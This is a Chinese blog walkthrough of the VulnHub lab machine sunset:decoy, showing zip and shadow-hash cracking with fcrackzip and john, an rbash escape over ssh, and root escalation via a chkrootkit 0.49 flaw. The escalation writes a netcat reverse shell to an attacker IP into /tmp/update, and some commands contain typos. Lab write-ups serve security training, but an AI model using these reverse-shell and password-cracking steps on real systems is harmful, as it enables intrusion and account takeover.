vulhub-sunset:decoy

最新推荐文章于 2024-09-24 14:30:00 发布
最新推荐文章于 2024-09-24 14:30:00 发布
阅读量677 收藏 16
点赞数 11
文章标签: elasticsearch 大数据 搜索引擎
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/138603082
版权

常规端口扫描,有22,80

解密压缩文件

有个.zip文件

wget http://192.168.190.85/save.zip

unzip save.zip需要密码

利用fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u save.zip 破解 密码manuel

或者

# 利用zip2john将zip转换 zip2john save.zip → password.hash #

利用john离线破译hash的zip密码 john --wordlist=/usr/share/wordlists/rockyou.txt password.hash

看shadow可以得到加密的密码

# 利用echo变成hash方便暴力破解 echo '296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::' > passwd.txt # 利用john离线破译txt密码 john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

得到了密码 server

绕过rbash(ssh)

有rbash

简单枚举一下,基本可以绕过的命令都没有

用ssh 用户名@IP -t "bash --noprofile"绕过 记得添加环境变量才可以

# ssh登录之后获取环境变量 echo $PATH

# 重写环境变量 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

提权枚举

这个文件有点可疑

运行一下

5有交互但是看不到

系统会通知我们扫描将在 60 秒内启动。这暗示有一个正在运行的进程,我们可能想要仔细研究

Pspy

Pspy是一个命令行工具,用于在不需要root权限的情况下窥探进程。它允许您在其他用户运行的命令、cron任务等执行时查看它们。该工具通关循环遍历/proc下的值来获取进程参数信息。

wget https://github.com/DominicBreuker/pspy.git

kali:sudo python3 -m http.server 80

靶机:

wget http://192.168.45.194:80/pspy64

chmod +x pspy64

./pspy64

发现执行了/bin/sh /root/chkrootkit-0.49/chkrootkit

chkrootkit提权

searchsploit chkrootkit

仔细查看说在/tmp下放置一个update的文件会以root权限运行
那么构造一个恶意的update可以让我权限提升

echo "/usr/bin/nc -e /bin/sh 192.168.44.143 4444" > /tmp/update

chmod 777 update

./upadte

kali监听

kikifofo
关注
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1201
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
sundown-sunset:用于计算日落和日落时间的简单API
02-18
"sundown-sunset-master"可能包含测试用例,用来验证API在不同地理位置和日期下的正确性。开发者可以通过这些测试用例来确保API在各种情况下的表现。 在实际应用中,"sundown-sunset" API可以用于各种场景,如天气...
vulhub-sunset:dawn3
2201_75378806的博客
05-13 615
这台靶机的知识是win缓冲区溢出漏洞,本篇文章是按照b站红队笔记师傅视频学习的nmap 常规扫描,有个6812端口和21端口匿名登入ftp,下载dawn3.exefile,binwalk,strings先查看一下文件从输出中可以看到一些信息:PE32 是一种用于 32 位 Windows 操作系统的可执行文件格式"(console)" 表示这是一个控制台应用程序。
vulnhub-sunset: decoy-wp
yutianovo的博客
07-14 406
靶机信息 blog:http://blog.yutian233.xyz/ Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware https://www.vulnhub.com/entry/sunset-decoy,505/
vulhub-sunset:sundown
2201_75378806的博客
05-13 418
使用wpscan扫描,发现插件:wp-with-spritz(wp的插件也有爆出漏洞,平时渗透要注意)#创建自定义函数sys_exec 类型是integer,别名 soname 文件名(导入udf函数。goole搜搜漏洞该插件存在存在文件包含漏洞with Spritz 1.0 - 远程文件包含。读取一下wp-config文件,权限不够需要www-data网站权限,利用前面的文件包含。#将udf文件内容传入新建的udf文件中,这里的dumpfile要和查看的路劲一致。或者searchsploit。
vulhub-sunset:solstice
2201_75378806的博客
05-13 306
所以在网上找到apache2的访问日志可能保存的文件路径,挨个进行文件包含看看访问日志到底保存在哪里,最后发现在/var/log/apache2/access.log。由于这个php文件是由root运行的,并且我们有写权限,因此我们可以将文件的内容更改为恶意php代码,这将为我们提供反向shell。由于nmap扫描出80端口是apache httpd 2.4.38,可以试试apache日志中毒。我们将使用这个 php 代码来获取反向 shell,将 ip 更改为攻击者的 ip 并记住端口。
vulhub-Sunset:Twilight
2201_75378806的博客
05-09 162
指定了盐为 "a",最后的 "a" 是要加密的原始密码。先将原始原件下载到本地,方便有问题可以恢复。它还说我们对/passwd有写入权限。表示使用 MD5 加密算法,上传linpease。解密一下shadow。
vulnhub靶机-sunset:dusk
臭nana的博客
07-18 1064
1、获取靶机ip:192.168.0.127 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.127 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.127 Host is up (0.00097s latency). Not shown: 65529 closed ports PORT STATE SER
vulnhub sunset: decoy
箭雨镜屋
03-27 734
nmap扫描 ---- fcrackzip破解save.zip密码 ---- john暴力破解shadow中普通用户密码 ---- rbash绕过 ---- 发现并执行chkrootkit ---- 利用chkrootkit 0.49的漏洞提权
vulnhub靶机-sunsetdecoy
臭nana的博客
07-20 1733
1、找到靶机ip:192.168.0.129 nmap -sn 192.168.0.0/24 2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态 root@kali:~# nmap -p- -A 192.168.0.129 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.129 Host is up (0.0057s latency). Not shown: 65528 closed p
ember-initials:适用于Ember应用程序的高级头像生成器。 首字母:circled_M:,图像:sunset:,凹版:woman_light_skin_tone:和可爱:smiling_face_with_heart-eyes:所有您需要的用户个人资料!
04-25
Ember Initials是一个使用用户的姓名缩写,图像,凹版印刷或可爱的东西生成简单化身的程序包。 它绝对支持Ember 3.16(或更高版本)。 得益于高度可定制的界面,您可以定义默认值甚至设置后备。...
sunrise-sunset-map:PHP和ReactJS Sunrisesunset计算器。 Sunrisesunsetmap.com的源代码-Calculator source code
03-24
这是的源代码。 该网站最初建于2005年,甚至早于jQuery(当时IE6是主要的浏览器)。 它旨在在廉价的共享主机上运行。 直到最近,我还是将其搁置一旁,但现在已使用ReactJS和SCSS将其重建为现代标准,并使用Google...
Sunset-Animation-CSS:使用完整CSS制作的日落动画
03-19
在本项目"Sunset-Animation-CSS"中,开发者通过纯CSS技术实现了一段日落动画,这展示了CSS在创建动态视觉效果方面的强大能力。这个动画可能包括天空颜色的渐变、太阳缓慢落下以及云彩随风飘动等元素,为网页增添了一...
ElasticSearch分页查询性能及封装实现
糖拌西红柿
09-23 841
es深度分页、elasticsearch分页性能优化、es分页性能、from+size分页原理、scroll分页、search_after分页、RestHighLevelClient封装,es查询优化
基于Es和智普AI实现的语义检索
qq_17805707的博客
09-23 753
语义检索是一种利用自然语言处理(NLP)和人工智能(AI)技术来理解搜索查询的语义,以提供更准确和相关搜索结果的搜索技术,语义检索是一项突破性的技术,旨在通过深入理解单词和短语的含义及上下文来提供更为准确的搜索结果。与传统的基于关键词的搜索不同,语义检索侧重于查询的意图和语境,而不仅仅是关键词的直接匹配。
AOP实现自动化日志记录,并将日志记录到es中
MogulNemenis的博客
09-23 419
日志记录: 使用 SLF4J 和 Logback 进行日志记录。AOP: 使用 AOP 记录方法执行时间及相关信息,并将日志发送到 ElasticsearchElasticsearch: 使用 Elasticsearch 存储和查询日志,配合 Kibana 实现可视化。优化: 通过引入 AOP,可以实现统一的日志记录逻辑,减少代码重复,方便管理。
Elasticsearch系列廿二】特殊参数
最新发布
檀越的博客
09-24 2622
💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。非常期待和您一起在这个小小的网络世界里共同探索、学习和成长。💝💝💝 ✨✨ 欢迎订阅本专栏 ✨✨。
Elasticsearch 检索优化:停用词的应用
后端开发
09-21 1237
Elasticsearch 中,可以通过修改索引的settings来定义自定义分析器,并为其添加停用词过滤器。可以通过stopwords参数指定停用词列表,支持内置语言值或自定义停用词文件。如果内置的停用词列表不满足需求,可以自定义停用词过滤器。},
Midnight = 1/2(Sunrise - Sunset)java表示
05-25
假设Sunrise和Sunset是以毫秒为单位表示的时间戳,可以使用以下Java代码计算Midnight: ``` long sunrise = /* 用毫秒表示的日出时间戳 */; long sunset = /* 用毫秒表示的日落时间戳 */; long midnight = (sun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值